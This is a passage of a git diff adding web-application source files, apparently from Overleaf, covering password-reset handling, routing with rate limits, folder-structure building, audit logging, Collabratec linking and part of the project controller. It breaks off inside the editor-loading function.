SplitTestHandler.promises.getAssignment( + req, + res, + 'auth-pages-bs5' + ) + + if (req.query.passwordResetToken != null) { + try { + const result = + await PasswordResetHandler.promises.getUserForPasswordResetToken( + req.query.passwordResetToken + ) + + const { user, remainingPeeks } = result || {} + if (!user || remainingPeeks <= 0) { + return res.redirect('/user/password/reset?error=token_expired') + } + req.session.resetToken = req.query.passwordResetToken + if (variant === 'enabled') { + req.session.setPasswordBS5 = true + } + + let emailQuery = '' + + if (typeof req.query.email === 'string') { + const email = EmailsHelper.parseEmail(req.query.email) + if (email) { + emailQuery = `?email=${encodeURIComponent(email)}` + } + } + + return res.redirect('/user/password/set' + emailQuery) + } catch (err) { + if (err.name === 'ForbiddenError') { + return next(err) + } + return res.redirect('/user/password/reset?error=token_expired') + } + } + + if (req.session.resetToken == null) { + return res.redirect('/user/password/reset') + } + + const email = EmailsHelper.parseEmail(req.query.email) + + // clean up to avoid leaking the token in the session object + const passwordResetToken = req.session.resetToken + delete req.session.resetToken + + const template = req.session.setPasswordBS5 + ? 'user/setPassword-bs5' + : 'user/setPassword' + + delete req.session.setPasswordBS5 + + res.render(template, { + title: 'set_password', + email, + passwordResetToken, + }) +} + +async function renderRequestResetForm(req, res) { + const errorQuery = req.query.error + let error = null + if (errorQuery === 'token_expired') { + error = 'password_reset_token_expired' + } + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'auth-pages-bs5' + ) + + const template = + variant === 'enabled' ? 'user/passwordReset-bs5' : 'user/passwordReset' + + res.render(template, { + title: 'reset_password', + error, + }) +} + +export default { + renderRequestResetForm: expressify(renderRequestResetForm), + requestReset: expressify(requestReset), + renderSetPasswordForm: expressify(renderSetPasswordForm), + setNewUserPassword: expressify(setNewUserPassword), +} diff --git a/services/web/app/src/Features/PasswordReset/PasswordResetHandler.mjs b/services/web/app/src/Features/PasswordReset/PasswordResetHandler.mjs new file mode 100644 index 0000000..094f18b --- /dev/null +++ b/services/web/app/src/Features/PasswordReset/PasswordResetHandler.mjs @@ -0,0 +1,148 @@ +import settings from '@overleaf/settings' +import UserAuditLogHandler from '../User/UserAuditLogHandler.js' +import UserGetter from '../User/UserGetter.js' +import OneTimeTokenHandler from '../Security/OneTimeTokenHandler.js' +import EmailHandler from '../Email/EmailHandler.js' +import AuthenticationManager from '../Authentication/AuthenticationManager.js' +import { callbackify, promisify } from 'node:util' +import PermissionsManager from '../Authorization/PermissionsManager.js' + +const assertUserPermissions = PermissionsManager.promises.assertUserPermissions + +const AUDIT_LOG_TOKEN_PREFIX_LENGTH = 10 + +async function generateAndEmailResetToken(email) { + const user = await UserGetter.promises.getUserByAnyEmail(email) + + if (!user) { + return null + } + + if (user.email !== email) { + return 'secondary' + } + + await assertUserPermissions(user, ['change-password']) + + const data = { user_id: user._id.toString(), email } + const token = await OneTimeTokenHandler.promises.getNewToken('password', data) + + const emailOptions = { + to: email, + setNewPasswordUrl: `${ + settings.siteUrl + }/user/password/set?passwordResetToken=${token}&email=${encodeURIComponent( + email + )}`, + } + + await EmailHandler.promises.sendEmail('passwordResetRequested', emailOptions) + + return 'primary' +} + +function expirePasswordResetToken(token, callback) { + OneTimeTokenHandler.expireToken('password', token, err => { + return callback(err) + }) +} + +async function getUserForPasswordResetToken(token) { + let result + try { + result = await OneTimeTokenHandler.promises.peekValueFromToken( + 'password', + token + ) + } catch (err) { + if (err.name === 'NotFoundError') { + return + } else { + throw err + } + } + const { data, remainingPeeks } = result || {} + + if (data == null || data.email == null) { + return { user: null, remainingPeeks } + } + + const user = await UserGetter.promises.getUserByMainEmail(data.email, { + _id: 1, + 'overleaf.id': 1, + email: 1, + must_reconfirm: 1, + }) + + await assertUserPermissions(user, ['change-password']) + + if (user == null) { + return { user: null, remainingPeeks: 0 } + } else if (data.user_id != null && data.user_id === user._id.toString()) { + return { user, remainingPeeks } + } else if ( + data.v1_user_id != null && + user.overleaf != null && + data.v1_user_id === user.overleaf.id + ) { + return { user, remainingPeeks } + } else { + return { user: null, remainingPeeks: 0 } + } +} + +async function setNewUserPassword(token, password, auditLog) { + const result = + await PasswordResetHandler.promises.getUserForPasswordResetToken(token) + const { user } = result || {} + + if (!user) { + return { + found: false, + reset: false, + userId: null, + } + } + await UserAuditLogHandler.promises.addEntry( + user._id, + 'reset-password', + auditLog.initiatorId, + auditLog.ip, + { token: token.substring(0, AUDIT_LOG_TOKEN_PREFIX_LENGTH) } + ) + + const reset = await AuthenticationManager.promises.setUserPassword( + user, + password + ) + + await PasswordResetHandler.promises.expirePasswordResetToken(token) + + return { + found: true, + reset, + userId: user._id, + mustReconfirm: user.must_reconfirm, + } +} + +const PasswordResetHandler = { + generateAndEmailResetToken: callbackify(generateAndEmailResetToken), + + setNewUserPassword: callbackify(setNewUserPassword), + + getUserForPasswordResetToken: callbackify(getUserForPasswordResetToken), + + expirePasswordResetToken, +} + +PasswordResetHandler.promises = { + generateAndEmailResetToken, + getUserForPasswordResetToken, + expirePasswordResetToken: promisify( + PasswordResetHandler.expirePasswordResetToken + ), + setNewUserPassword, +} + +export default PasswordResetHandler diff --git a/services/web/app/src/Features/PasswordReset/PasswordResetRouter.mjs b/services/web/app/src/Features/PasswordReset/PasswordResetRouter.mjs new file mode 100644 index 0000000..e750d11 --- /dev/null +++ b/services/web/app/src/Features/PasswordReset/PasswordResetRouter.mjs @@ -0,0 +1,77 @@ +import PasswordResetController from './PasswordResetController.mjs' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import CaptchaMiddleware from '../../Features/Captcha/CaptchaMiddleware.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import { Joi, validate } from '../../infrastructure/Validation.js' + +const rateLimiter = new RateLimiter('password_reset_rate_limit', { + points: 6, + duration: 60, +}) + +export default { + apply(webRouter) { + const rateLimit = RateLimiterMiddleware.rateLimit(rateLimiter, { + ipOnly: true, + }) + + webRouter.get( + '/user/password/reset', + validate({ + query: { error: Joi.string() }, + }), + PasswordResetController.renderRequestResetForm + ) + webRouter.post( + '/user/password/reset', + validate({ + body: Joi.object({ + email: Joi.string().required(), + }), + }), + rateLimit, + CaptchaMiddleware.validateCaptcha('passwordReset'), + PasswordResetController.requestReset + ) + AuthenticationController.addEndpointToLoginWhitelist('/user/password/reset') + + webRouter.get( + '/user/password/set', + validate({ + query: { + email: Joi.string().required(), + passwordResetToken: Joi.string(), + }, + }), + rateLimit, + PasswordResetController.renderSetPasswordForm + ) + webRouter.post( + '/user/password/set', + validate({ + body: Joi.object({ + password: Joi.string().required(), + passwordResetToken: Joi.string().required(), + }), + }), + rateLimit, + PasswordResetController.setNewUserPassword + ) + AuthenticationController.addEndpointToLoginWhitelist('/user/password/set') + + webRouter.post( + '/user/reconfirm', + validate({ + body: Joi.object({ + email: Joi.string().required(), + }), + }), + rateLimit, + CaptchaMiddleware.validateCaptcha('passwordReset'), + PasswordResetController.requestReset + ) + }, + + rateLimiter, +} diff --git a/services/web/app/src/Features/Project/DocLinesComparitor.mjs b/services/web/app/src/Features/Project/DocLinesComparitor.mjs new file mode 100644 index 0000000..43c8ad1 --- /dev/null +++ b/services/web/app/src/Features/Project/DocLinesComparitor.mjs @@ -0,0 +1,13 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +import _ from 'lodash' + +export default { + areSame(lines1, lines2) { + if (!Array.isArray(lines1) || !Array.isArray(lines2)) { + return false + } + + return _.isEqual(lines1, lines2) + }, +} diff --git a/services/web/app/src/Features/Project/FolderStructureBuilder.js b/services/web/app/src/Features/Project/FolderStructureBuilder.js new file mode 100644 index 0000000..d091c71 --- /dev/null +++ b/services/web/app/src/Features/Project/FolderStructureBuilder.js @@ -0,0 +1,73 @@ +const Path = require('path') +const OError = require('@overleaf/o-error') +const { ObjectId } = require('mongodb-legacy') + +module.exports = { buildFolderStructure } + +function buildFolderStructure(docEntries, fileEntries) { + const builder = new FolderStructureBuilder() + for (const docEntry of docEntries) { + builder.addDocEntry(docEntry) + } + for (const fileEntry of fileEntries) { + builder.addFileEntry(fileEntry) + } + return builder.rootFolder +} + +class FolderStructureBuilder { + constructor() { + this.foldersByPath = new Map() + this.entityPaths = new Set() + this.rootFolder = this.createFolder('rootFolder') + this.foldersByPath.set('/', this.rootFolder) + this.entityPaths.add('/') + } + + addDocEntry(docEntry) { + this.recordEntityPath(docEntry.path) + const folderPath = Path.dirname(docEntry.path) + const folder = this.mkdirp(folderPath) + folder.docs.push(docEntry.doc) + } + + addFileEntry(fileEntry) { + this.recordEntityPath(fileEntry.path) + const folderPath = Path.dirname(fileEntry.path) + const folder = this.mkdirp(folderPath) + folder.fileRefs.push(fileEntry.file) + } + + mkdirp(path) { + const existingFolder = this.foldersByPath.get(path) + if (existingFolder != null) { + return existingFolder + } + // Folder not found, create it. + this.recordEntityPath(path) + const dirname = Path.dirname(path) + const basename = Path.basename(path) + const parentFolder = this.mkdirp(dirname) + const newFolder = this.createFolder(basename) + parentFolder.folders.push(newFolder) + this.foldersByPath.set(path, newFolder) + return newFolder + } + + recordEntityPath(path) { + if (this.entityPaths.has(path)) { + throw new OError('entity already exists', { path }) + } + this.entityPaths.add(path) + } + + createFolder(name) { + return { + _id: new ObjectId(), + name, + folders: [], + docs: [], + fileRefs: [], + } + } +} diff --git a/services/web/app/src/Features/Project/IterablePath.js b/services/web/app/src/Features/Project/IterablePath.js new file mode 100644 index 0000000..52cf068 --- /dev/null +++ b/services/web/app/src/Features/Project/IterablePath.js @@ -0,0 +1,15 @@ +/** + * Handles malformed filetrees - when fields such as `folder.docs`, + * `folder.folders` or `folder.fileRefs` are missing it returns an + * empty array. + */ +function iterablePaths(folder, field) { + if (!folder) { + return [] + } + return folder[field] || [] +} + +module.exports = { + iterablePaths, +} diff --git a/services/web/app/src/Features/Project/ProjectApiController.mjs b/services/web/app/src/Features/Project/ProjectApiController.mjs new file mode 100644 index 0000000..afdc0f3 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectApiController.mjs @@ -0,0 +1,30 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import ProjectDetailsHandler from './ProjectDetailsHandler.js' + +import logger from '@overleaf/logger' + +export default { + getProjectDetails(req, res, next) { + const { project_id: projectId } = req.params + return ProjectDetailsHandler.getDetails( + projectId, + function (err, projDetails) { + if (err != null) { + return next(err) + } + return res.json(projDetails) + } + ) + }, +} diff --git a/services/web/app/src/Features/Project/ProjectAuditLogHandler.js b/services/web/app/src/Features/Project/ProjectAuditLogHandler.js new file mode 100644 index 0000000..1c31e1b --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectAuditLogHandler.js @@ -0,0 +1,57 @@ +const logger = require('@overleaf/logger') +const { ProjectAuditLogEntry } = require('../../models/ProjectAuditLogEntry') +const { callbackify } = require('@overleaf/promise-utils') + +module.exports = { + promises: { + addEntry, + }, + addEntry: callbackify(addEntry), // callback version of addEntry + addEntryInBackground, +} + +/** + * Add an audit log entry + * + * The entry should include at least the following fields: + * + * - operation: a string identifying the type of operation + * - userId: the user on behalf of whom the operation was performed + * - message: a string detailing what happened + */ +async function addEntry( + projectId, + operation, + initiatorId, + ipAddress, + info = {} +) { + const entry = { + projectId, + operation, + initiatorId, + ipAddress, + info, + } + await ProjectAuditLogEntry.create(entry) +} + +/** + * Add an audit log entry in the background + * + * This function doesn't return a promise. Instead, it catches any error and logs it. + */ +function addEntryInBackground( + projectId, + operation, + initiatorId, + ipAddress, + info = {} +) { + addEntry(projectId, operation, initiatorId, ipAddress, info).catch(err => { + logger.error( + { err, projectId, operation, initiatorId, ipAddress, info }, + 'Failed to write audit log' + ) + }) +} diff --git a/services/web/app/src/Features/Project/ProjectCollabratecDetailsHandler.js b/services/web/app/src/Features/Project/ProjectCollabratecDetailsHandler.js new file mode 100644 index 0000000..59547e7 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectCollabratecDetailsHandler.js @@ -0,0 +1,100 @@ +const { ObjectId } = require('mongodb-legacy') +const { Project } = require('../../models/Project') +const { callbackifyAll } = require('@overleaf/promise-utils') + +const ProjectCollabratecDetailsHandler = { + async initializeCollabratecProject( + projectId, + userId, + collabratecDocumentId, + collabratecPrivategroupId + ) { + return await ProjectCollabratecDetailsHandler.setCollabratecUsers( + projectId, + [ + { + user_id: userId, + collabratec_document_id: collabratecDocumentId, + collabratec_privategroup_id: collabratecPrivategroupId, + }, + ] + ) + }, + + async isLinkedCollabratecUserProject(projectId, userId) { + projectId = new ObjectId(projectId) + userId = new ObjectId(userId) + + const query = { + _id: projectId, + collabratecUsers: { + $elemMatch: { + user_id: userId, + }, + }, + } + const project = await Project.findOne(query, { _id: 1 }).exec() + return project != null + }, + + async linkCollabratecUserProject(projectId, userId, collabratecDocumentId) { + projectId = new ObjectId(projectId) + userId = new ObjectId(userId) + + const query = { + _id: projectId, + collabratecUsers: { + $not: { + $elemMatch: { + collabratec_document_id: collabratecDocumentId, + user_id: userId, + }, + }, + }, + } + const update = { + $push: { + collabratecUsers: { + collabratec_document_id: collabratecDocumentId, + user_id: userId, + }, + }, + } + return await Project.updateOne(query, update).exec() + }, + + async setCollabratecUsers(projectId, collabratecUsers) { + projectId = new ObjectId(projectId) + + if (!Array.isArray(collabratecUsers)) { + throw new Error('collabratec_users must be array') + } + + for (const collabratecUser of collabratecUsers) { + collabratecUser.user_id = new ObjectId(collabratecUser.user_id) + } + + const update = { $set: { collabratecUsers } } + return await Project.updateOne({ _id: projectId }, update).exec() + }, + + async unlinkCollabratecUserProject(projectId, userId) { + projectId = new ObjectId(projectId) + userId = new ObjectId(userId) + + const query = { _id: projectId } + const update = { + $pull: { + collabratecUsers: { + user_id: userId, + }, + }, + } + await Project.updateOne(query, update).exec() + }, +} + +module.exports = { + ...callbackifyAll(ProjectCollabratecDetailsHandler), + promises: ProjectCollabratecDetailsHandler, +} diff --git a/services/web/app/src/Features/Project/ProjectController.js b/services/web/app/src/Features/Project/ProjectController.js new file mode 100644 index 0000000..5a01df5 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectController.js @@ -0,0 +1,1264 @@ +const _ = require('lodash') +const OError = require('@overleaf/o-error') +const crypto = require('crypto') +const { setTimeout } = require('timers/promises') +const pProps = require('p-props') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') +const { ObjectId } = require('mongodb-legacy') +const ProjectDeleter = require('./ProjectDeleter') +const ProjectDuplicator = require('./ProjectDuplicator') +const ProjectCreationHandler = require('./ProjectCreationHandler') +const EditorController = require('../Editor/EditorController') +const ProjectHelper = require('./ProjectHelper') +const metrics = require('@overleaf/metrics') +const { User } = require('../../models/User') +const SubscriptionLocator = require('../Subscription/SubscriptionLocator') +const LimitationsManager = require('../Subscription/LimitationsManager') +const FeaturesHelper = require('../Subscription/FeaturesHelper') +const Settings = require('@overleaf/settings') +const AuthorizationManager = require('../Authorization/AuthorizationManager') +const InactiveProjectManager = require('../InactiveData/InactiveProjectManager') +const ProjectUpdateHandler = require('./ProjectUpdateHandler') +const ProjectGetter = require('./ProjectGetter') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const SessionManager = require('../Authentication/SessionManager') +const Sources = require('../Authorization/Sources') +const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const ProjectEntityHandler = require('./ProjectEntityHandler') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const Features = require('../../infrastructure/Features') +const BrandVariationsHandler = require('../BrandVariations/BrandVariationsHandler') +const UserController = require('../User/UserController') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const SplitTestSessionHandler = require('../SplitTests/SplitTestSessionHandler') +const FeaturesUpdater = require('../Subscription/FeaturesUpdater') +const SpellingHandler = require('../Spelling/SpellingHandler') +const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') +const InstitutionsFeatures = require('../Institutions/InstitutionsFeatures') +const InstitutionsGetter = require('../Institutions/InstitutionsGetter') +const ProjectAuditLogHandler = require('./ProjectAuditLogHandler') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const TagsHandler = require('../Tags/TagsHandler') +const TutorialHandler = require('../Tutorial/TutorialHandler') +const OnboardingDataCollectionManager = require('../OnboardingDataCollection/OnboardingDataCollectionManager') +const UserUpdater = require('../User/UserUpdater') +const Modules = require('../../infrastructure/Modules') +const UserGetter = require('../User/UserGetter') +const { + isStandaloneAiAddOnPlanCode, +} = require('../Subscription/PaymentProviderEntities') +const SubscriptionController = require('../Subscription/SubscriptionController.js') +const { formatCurrency } = require('../../util/currency') + +/** + * @import { GetProjectsRequest, GetProjectsResponse, Project } from "./types" + */ + +const _ProjectController = { + _isInPercentageRollout(rolloutName, objectId, percentage) { + if (Settings.bypassPercentageRollouts === true) { + return true + } + const data = `${rolloutName}:${objectId.toString()}` + const md5hash = crypto.createHash('md5').update(data).digest('hex') + const counter = parseInt(md5hash.slice(26, 32), 16) + return counter % 100 < percentage + }, + + async updateProjectSettings(req, res) { + const projectId = req.params.Project_id + + if (req.body.compiler != null) { + await EditorController.promises.setCompiler(projectId, req.body.compiler) + } + + if (req.body.imageName != null) { + await EditorController.promises.setImageName( + projectId, + req.body.imageName + ) + } + + if (req.body.name != null) { + await EditorController.promises.renameProject(projectId, req.body.name) + } + + if (req.body.spellCheckLanguage != null) { + await EditorController.promises.setSpellCheckLanguage( + projectId, + req.body.spellCheckLanguage + ) + } + + if (req.body.rootDocId != null) { + await EditorController.promises.setRootDoc(projectId, req.body.rootDocId) + } + + if (req.body.mainBibliographyDocId != null) { + await EditorController.promises.setMainBibliographyDoc( + projectId, + req.body.mainBibliographyDocId + ) + } + + res.sendStatus(204) + }, + + async updateProjectAdminSettings(req, res) { + const projectId = req.params.Project_id + const user = SessionManager.getSessionUser(req.session) + const publicAccessLevel = req.body.publicAccessLevel + const publicAccessLevels = [ + PublicAccessLevels.READ_ONLY, + PublicAccessLevels.READ_AND_WRITE, + PublicAccessLevels.PRIVATE, + PublicAccessLevels.TOKEN_BASED, + ] + + if ( + req.body.publicAccessLevel != null && + publicAccessLevels.includes(publicAccessLevel) + ) { + await EditorController.promises.setPublicAccessLevel( + projectId, + req.body.publicAccessLevel + ) + + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'toggle-access-level', + user._id, + req.ip, + { publicAccessLevel: req.body.publicAccessLevel, status: 'OK' } + ) + res.sendStatus(204) + } else { + res.sendStatus(500) + } + }, + + async deleteProject(req, res) { + const projectId = req.params.Project_id + const user = SessionManager.getSessionUser(req.session) + await ProjectDeleter.promises.deleteProject(projectId, { + deleterUser: user, + ipAddress: req.ip, + }) + + res.sendStatus(200) + }, + + async archiveProject(req, res) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + await ProjectDeleter.promises.archiveProject(projectId, userId) + res.sendStatus(200) + }, + + async unarchiveProject(req, res) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + await ProjectDeleter.promises.unarchiveProject(projectId, userId) + res.sendStatus(200) + }, + + async trashProject(req, res) { + const projectId = req.params.project_id + const userId = SessionManager.getLoggedInUserId(req.session) + await ProjectDeleter.promises.trashProject(projectId, userId) + res.sendStatus(200) + }, + + async untrashProject(req, res) { + const projectId = req.params.project_id + const userId = SessionManager.getLoggedInUserId(req.session) + await ProjectDeleter.promises.untrashProject(projectId, userId) + res.sendStatus(200) + }, + + async expireDeletedProjectsAfterDuration(_req, res) { + await ProjectDeleter.promises.expireDeletedProjectsAfterDuration() + res.sendStatus(200) + }, + + async expireDeletedProject(req, res) { + const { projectId } = req.params + await ProjectDeleter.promises.expireDeletedProject(projectId) + res.sendStatus(200) + }, + + async restoreProject(req, res) { + const projectId = req.params.Project_id + await ProjectDeleter.promises.restoreProject(projectId) + res.sendStatus(200) + }, + + async cloneProject(req, res, next) { + res.setTimeout(5 * 60 * 1000) // allow extra time for the copy to complete + metrics.inc('cloned-project') + const projectId = req.params.Project_id + const { projectName, tags } = req.body + logger.debug({ projectId, projectName }, 'cloning project') + if (!SessionManager.isUserLoggedIn(req.session)) { + return res.json({ redir: '/register' }) + } + const currentUser = SessionManager.getSessionUser(req.session) + const { first_name: firstName, last_name: lastName, email } = currentUser + try { + const project = await ProjectDuplicator.promises.duplicate( + currentUser, + projectId, + projectName, + tags + ) + res.json({ + name: project.name, + lastUpdated: project.lastUpdated, + project_id: project._id, + owner_ref: project.owner_ref, + owner: { + first_name: firstName, + last_name: lastName, + email, + _id: currentUser._id, + }, + }) + } catch (err) { + OError.tag(err, 'error cloning project', { + projectId, + userId: currentUser._id, + }) + return next(err) + } + }, + + async newProject(req, res) { + const currentUser = SessionManager.getSessionUser(req.session) + const { + first_name: firstName, + last_name: lastName, + email, + _id: userId, + } = currentUser + const projectName = + req.body.projectName != null ? req.body.projectName.trim() : undefined + const { template } = req.body + + const project = await (template === 'example' + ? ProjectCreationHandler.promises.createExampleProject( + userId, + projectName + ) + : ProjectCreationHandler.promises.createBasicProject(userId, projectName)) + + res.json({ + project_id: project._id, + owner_ref: project.owner_ref, + owner: { + first_name: firstName, + last_name: lastName, + email, + _id: userId, + }, + }) + }, + + async renameProject(req, res) { + const projectId = req.params.Project_id + const newName = req.body.newProjectName + await EditorController.promises.renameProject(projectId, newName) + res.sendStatus(200) + }, + + async userProjectsJson(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + let projects = await ProjectGetter.promises.findAllUsersProjects( + userId, + 'name lastUpdated publicAccesLevel archived trashed owner_ref' + ) + + // _buildProjectList already converts archived/trashed to booleans so isArchivedOrTrashed should not be used here + projects = ProjectController._buildProjectList(projects, userId) + .filter(p => !(p.archived || p.trashed)) + .map(p => ({ _id: p.id, name: p.name, accessLevel: p.accessLevel })) + + res.json({ projects }) + }, + + async projectEntitiesJson(req, res) { + const projectId = req.params.Project_id + const project = await ProjectGetter.promises.getProject(projectId) + + const { docs, files } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + const entities = docs + .concat(files) + // Sort by path ascending + .sort((a, b) => (a.path > b.path ? 1 : a.path < b.path ? -1 : 0)) + .map(e => ({ + path: e.path, + type: e.doc != null ? 'doc' : 'file', + })) + res.json({ project_id: projectId, entities }) + }, + + async loadEditor(req, res, next) { + const timer = new metrics.Timer('load-editor') + if (!Settings.editorIsOpen) { + return res.render('general/closed', { title: 'updating_site' }) + } + + let anonymous, userId, sessionUser + if (SessionManager.isUserLoggedIn(req.session)) { + sessionUser = SessionManager.getSessionUser(req.session) + userId = SessionManager.getLoggedInUserId(req.session) + anonymous = false + } else { + sessionUser = null + anonymous = true + userId = null + } + + const projectId = req.params.Project_id + + // should not be used in place of split tests query param overrides (?my-split-test-name=my-variant) + function shouldDisplayFeature(name, variantFlag) { + if (req.query && req.query[name]) { + return req.query[name] === 'true' + } else { + return variantFlag === true + } + } + + const splitTests = [ + 'compile-log-events', + 'external-socket-heartbeat', + 'full-project-search', + 'null-test-share-modal', + 'fall-back-to-clsi-cache', + 'initial-compile-from-clsi-cache', + 'pdf-caching-cached-url-lookup', + 'pdf-caching-mode', + 'pdf-caching-prefetch-large', + 'pdf-caching-prefetching', + 'revert-file', + 'revert-project', + !anonymous && 'ro-mirror-on-client', + 'track-pdf-download', + !anonymous && 'writefull-oauth-promotion', + 'hotjar', + 'reviewer-role', + 'editor-redesign', + 'paywall-change-compile-timeout', + 'overleaf-assist-bundle', + 'wf-feature-rebrand', + ].filter(Boolean) + + const getUserValues = async userId => + pProps( + _.mapValues({ + user: (async () => { + const user = await User.findById( + userId, + 'email first_name last_name referal_id signUpDate featureSwitches features featuresEpoch refProviders alphaProgram betaProgram isAdmin ace labsProgram labsExperiments completedTutorials writefull aiErrorAssistant' + ).exec() + // Handle case of deleted user + if (!user) { + UserController.logout(req, res, next) + return + } + logger.debug({ projectId, userId }, 'got user') + return FeaturesUpdater.featuresEpochIsCurrent(user) + ? user + : await ProjectController._refreshFeatures(req, user) + })(), + learnedWords: SpellingHandler.promises.getUserDictionary(userId), + projectTags: TagsHandler.promises.getTagsForProject( + userId, + projectId + ), + userHasInstitutionLicence: InstitutionsFeatures.promises + .hasLicence(userId) + .catch(err => { + logger.error({ err, userId }, 'failed to get institution licence') + return false + }), + affiliations: InstitutionsGetter.promises + .getCurrentAffiliations(userId) + .catch(err => { + logger.error({ err, userId }, 'failed to get institution licence') + return false + }), + subscription: + SubscriptionLocator.promises.getUsersSubscription(userId), + isTokenMember: CollaboratorsGetter.promises.userIsTokenMember( + userId, + projectId + ), + isInvitedMember: + CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + userId, + projectId + ), + odcRole: OnboardingDataCollectionManager.getOnboardingDataValue( + userId, + 'role' + ).catch(err => { + logger.error({ err, userId }) + return null + }), + }) + ) + const splitTestAssignments = {} + + try { + const responses = await pProps({ + userValues: userId ? getUserValues(userId) : defaultUserValues(), + splitTestAssignments: Promise.all( + splitTests.map(async splitTest => { + splitTestAssignments[splitTest] = + await SplitTestHandler.promises.getAssignment(req, res, splitTest) + }) + ), + project: ProjectGetter.promises.getProject(projectId, { + name: 1, + lastUpdated: 1, + track_changes: 1, + owner_ref: 1, + brandVariationId: 1, + overleaf: 1, + tokens: 1, + tokenAccessReadAndWrite_refs: 1, // used for link sharing analytics + collaberator_refs: 1, // used for link sharing analytics + pendingEditor_refs: 1, // used for link sharing analytics + reviewer_refs: 1, + }), + userIsMemberOfGroupSubscription: sessionUser + ? (async () => + ( + await LimitationsManager.promises.userIsMemberOfGroupSubscription( + sessionUser + ) + ).isMember)() + : false, + _flushToTpds: + TpdsProjectFlusher.promises.flushProjectToTpdsIfNeeded(projectId), + _activate: + InactiveProjectManager.promises.reactivateProjectIfRequired( + projectId + ), + }) + + const { project, userValues, userIsMemberOfGroupSubscription } = responses + + const { + user, + learnedWords, + projectTags, + userHasInstitutionLicence, + subscription, + isTokenMember, + isInvitedMember, + odcRole, + } = userValues + + const brandVariation = project?.brandVariationId + ? await BrandVariationsHandler.promises.getBrandVariationById( + project.brandVariationId + ) + : undefined + + const anonRequestToken = TokenAccessHandler.getRequestToken( + req, + projectId + ) + const allowedImageNames = ProjectHelper.getAllowedImagesForUser(user) + + const privilegeLevel = + await AuthorizationManager.promises.getPrivilegeLevelForProject( + userId, + projectId, + anonRequestToken + ) + + const reviewerRoleAssignment = + await SplitTestHandler.promises.getAssignmentForUser( + project.owner_ref, + 'reviewer-role' + ) + + await Modules.promises.hooks.fire('enforceCollaboratorLimit', projectId) + if (isTokenMember) { + // Check explicitly that the user is in read write token refs, while this could be inferred + // from the privilege level, the privilege level of token members might later be restricted + const isReadWriteTokenMember = + await CollaboratorsGetter.promises.userIsReadWriteTokenMember( + userId, + projectId + ) + if (isReadWriteTokenMember) { + // Check for an edge case where a user is both in read write token access refs but also + // an invited read write member. Ensure they are not redirected to the sharing updates page + // We could also delete the token access ref if the user is already a member of the project + const isInvitedReadWriteMember = + await CollaboratorsGetter.promises.isUserInvitedReadWriteMemberOfProject( + userId, + projectId + ) + if (!isInvitedReadWriteMember) { + return res.redirect(`/project/${projectId}/sharing-updates`) + } + } + } + + if (privilegeLevel == null || privilegeLevel === PrivilegeLevels.NONE) { + return res.sendStatus(401) + } + + const allowedFreeTrial = + subscription == null || + isStandaloneAiAddOnPlanCode(subscription.planCode) + + let wsUrl = Settings.wsUrl + let metricName = 'load-editor-ws' + if (user.betaProgram && Settings.wsUrlBeta !== undefined) { + wsUrl = Settings.wsUrlBeta + metricName += '-beta' + } else if ( + Settings.wsUrlV2 && + Settings.wsUrlV2Percentage > 0 && + (new ObjectId(projectId).getTimestamp() / 1000) % 100 < + Settings.wsUrlV2Percentage + ) { + wsUrl = Settings.wsUrlV2 + metricName += '-v2' + } + if (req.query && req.query.ws === 'fallback') { + // `?ws=fallback` will connect to the bare origin, and ignore + // the custom wsUrl. Hence it must load the client side + // javascript from there too. + // Not resetting it here would possibly load a socket.io v2 + // client and connect to a v0 endpoint. + wsUrl = undefined + metricName += '-fallback' + } + metrics.inc(metricName) + + // don't need to wait for these to complete + ProjectUpdateHandler.promises + .markAsOpened(projectId) + .catch(err => + logger.error({ err, projectId }, 'failed to mark project as opened') + ) + SplitTestSessionHandler.promises + .sessionMaintenance(req, userId ? user : null) + .catch(err => + logger.error({ err }, 'failed to update split test info in session') + ) + if (userId) { + const ownerFeatures = await UserGetter.promises.getUserFeatures( + project.owner_ref + ) + const planLimit = ownerFeatures?.collaborators || 0 + const namedEditors = project.collaberator_refs?.length || 0 + const pendingEditors = project.pendingEditor_refs?.length || 0 + const exceedAtLimit = planLimit > -1 && namedEditors >= planLimit + + let mode = 'edit' + if (privilegeLevel === PrivilegeLevels.READ_ONLY) { + mode = 'view' + } else if ( + project.track_changes === true || + project.track_changes?.[userId] === true + ) { + mode = 'review' + } + + const projectOpenedSegmentation = { + role: privilegeLevel, + mode, + ownerId: project.owner_ref, + projectId: project._id, + namedEditors, + pendingEditors, + tokenEditors: project.tokenAccessReadAndWrite_refs?.length || 0, + planLimit, + exceedAtLimit, + } + AnalyticsManager.recordEventForUserInBackground( + userId, + 'project-opened', + projectOpenedSegmentation + ) + User.updateOne( + { _id: new ObjectId(userId) }, + { $set: { lastActive: new Date() } } + ) + .exec() + .catch(err => + logger.error( + { err, userId }, + 'failed to update lastActive for user' + ) + ) + } + 